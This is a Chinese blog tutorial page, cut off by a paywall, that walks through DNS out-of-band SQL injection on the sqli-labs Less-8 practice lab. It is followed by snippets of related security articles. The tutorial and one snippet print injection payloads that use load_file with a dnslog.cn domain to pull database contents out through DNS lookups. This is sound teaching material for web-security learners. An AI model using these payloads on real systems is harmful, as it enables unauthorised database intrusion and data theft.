sql注入——dns的带外注入

最新推荐文章于 2025-04-02 13:05:07 发布
最新推荐文章于 2025-04-02 13:05:07 发布
阅读量3.7k 收藏 6
点赞数 7
CC 4.0 BY-SA版权
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cxrpty/article/details/104255459
本文通过sql labs8实例演示了SQL注入过程,利用DNS的带外注入技术获取域名信息。首先搜索并使用DNS.log软件,然后通过ping验证域名解析。接着在SQL查询中插入特殊语句,使得请求指向dnslog服务器上的文件。最后,通过修改查询语句,成功获取到数据库版本信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

以sql labs8为例

1.搜索dns.log在线软件,并get一个域名

2.在cmd中ping该域名,发现解析成功

3.在sql labs8中输入http://localhost/sqli-labs-master/Less-8/?id=1' and load_file("\\\\sss.cipv66.dnslog.cn\\xxx.txt") -- -,并执行

4.在dnslog上刷新查询,就可以看到sss就可以请求到了

5.在语句中修改为http://localhost/sqli-labs-master/

最低0.47元/天 解锁文章

200万优质内容无限畅学
数据库——DNS注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-14 1292
Mysql注入——DNS注入 靶场地址 原理:利用UNC路径去访问服务器,dns会有日志,通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志 1.,我们看到靶场,首先尝试最简单的get传参,注入 它是直接将id传参拼接进去,然后用mysqli_connect()函数进行针对数据库的查询,我们顺理成章再后面输入内容?id=1进行测试 页面正常,继续
30、WEB攻防——通用漏洞&SQL注入&CTF&二次&堆叠&DNS
qq_55202378的博客
01-21 602
假如在注册用户的时候,需要填用户名、邮箱和密码,登录使用邮箱和密码,登陆上去后会显示用户名,后台为什么知道你的用户名,就可能是使用SQL语句,通过你的邮箱和密码查询到用户名。假如用户名是SQL语句,会在插入的时候就执行SQL语句,然后显示。这就是二次注入的基本原理。应用程序:解决不回显、反向连接(DNS协议一般不被禁用)、SQL注入、命令执行、SSRF等。这个函数),某k真辣鸡,整这么些花里胡哨的。填写表单,保存数据默认会更新所有数据。在mysql中,支持16进制编码。
写bat脚本双击执行
qq_35911118的博客
04-08 3162
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
postgresql 带外注入
SopRomeo的博客
01-31 777
最近某秋弄了个比赛,有个题是FBCTF的原题魔改的脑洞题 记录下 postgresql带外注入(FBCTF) FBCTF详解 解题 这题就是脑洞,flag名字在.htaccess文件里,提示也只说flag在web的某个目录下,真鸡巴离谱,这题的数据库用户权限很低,只有查询权限,RCE是很困难的 我用的是联数据库的方法 vps环境:Ubuntu18.04 apt install 安装即可 百度有 修改配置文件 设置 listen_addresses = ‘*’ 重启服务 手机访问 f12体验苹果6 用上
记一次紧急安全事件:请求攻击(OOB)域名
可乐要加冰!!!
09-01 1717
记一次紧急安全事件:请求攻击(OOB)域名
DNS数据
最新发布
2301_78866120的博客
04-02 1102
DNS数据
SQL注入 - Part 3(
捡破烂日记^ ^
05-23 829
本篇主要是思路概述(sql注入新思路+waf)
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2412
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
SQL注入篇——一句话木马
爱国小白帽
01-08 6879
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
一篇学会SQL注入 | 详解SQL注入(基础向,基础到每个参数)
weixin_47075747的博客
06-14 1373
**括号里面的查询被称之为子查询,在执行顺序中子查询先执行,然后再执行面的 select **2) 的值是确定性的,假随机。
请求攻击(OOB)域名
完颜振江
02-20 1257
总之,OOB 域名是一种技术,通过将 DNS 查询发送到不同的网络上,以避免恶意actor 篡改DNS 数据,从而提高网络安全性。它的优点包括提高了网络安全性、降低了 DNS 攻击的风险和提高了网络可用性。然而,它也存在兼容性问题和性能差的缺点。Out-of-Band (OOB) 域名是一种技术,通过将域名系统(DNS) queries 发送到不同的网络上,以避免恶意actor 篡改DNS数据,从而提高网络安全性。
dnslog是什么
来而不往非礼也
05-14 1901
在看hw面经的时候发现了dnslog的相关的知识点,有点迷惑,所以写下这篇文章记录,方便日后查阅。
DNSlog注入 信息的 | sql注入利用详解+实操
weixin_48083470的博客
08-04 5538
DNSlog注入 DNSlog注入原理 dnslog注入也可以称之为dns查询,是一种注入姿势,可以通过查询相应的dns解析记录,来获取我们想要的数据 一般情况下,在我们无法通过联合查询直接获取数据的情况下,我们只能通过盲注,来一步步的获取数据,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度 首先说明,dns查询属于MySQL注入,在MySQL中有个系统属性 s
mysql攻击_[转载] MySQL 注入攻击与防御
weixin_39908082的博客
01-18 438
预估稿费:500RMB投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿本文主要是做一个Mysql注入总结,对于Mysql来说利用的方式太过于灵活,这里总结了一些主流的一些姿势,如果有好的姿势可以多加交流,文章如果有错也欢迎各位dalao指出:)注入常用函数与字符下面几点是注入中经常会用到的语句控制语句操作(select, case, if(), …)比较操作(=, like,...
dns数据【渗透测试】
热门推荐
leeezp的博客
09-09 32万+
上一篇文章我们已经介绍了搭建自己的dns log server 方法,接下来我将介绍如何通过dns query数据。下文中介绍的方法均为根据本人经验原创的方法,网上应该算是首次公开。
Java DNS解析与反序列化综合利用
No_1_is_me的博客
04-08 1512
与本篇第二部分的调用链详解中的第一层调用使用的方法是一模一样的,至此我们可以知道在反序列化时肯定是调用了put方法,这样我们就可以知道反序列化时也会发生dns解析并且信息。在java中InetAddress.getByName方法会解析域名,也就是会触发DNS解析,那么我们就可以利用它做dns。当把java.net.URL对象当做HashMap的put方法的key时,会触发dns解析,可以信息。这样,我们就在序列化之前,将hashCode的值改回了-1,后面反序列化的时候这里就不会成为问题。
dns查询(cloudeye.me的使用)
一个码农的笔记
11-23 1万+
一些操蛋盲注可以用dns查询来解决了,而且有了cloudeye这个神器就可以愉快的解决: 说明: 我们在浏览网页或者ping某个域名的时候我们先是从域名服务器里面获取那个网站的ip地址,然后我们才会发起对那台服务的请求,cloudeye留下了四级五级域名的控制权,所以我们能发起一个域名请求来在cloudeye留下日志信息,从将数据库的信息出来 比如:ping test.xxx
Day45:WEB攻防-PHP应用&SQL二次注入&堆叠执行&DNS&功能点&黑白盒条件
qq_61553520的博客
03-23 1077
小迪安全-Day45:WEB攻防-PHP应用&SQL二次注入&堆叠执行&DNS&功能点&黑白盒条件
网络安全技术竞技——CTF入门教程
- 常见漏洞与攻击:了解缓冲区溢出、SQL注入、跨站脚本(XSS)等常见的网络安全问题。 针对标签“PWN”,这代表了CTF竞赛中与二进制漏洞利用相关的题目类型,通常涉及以下知识点: - 二进制分析:分析程序的二进制...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值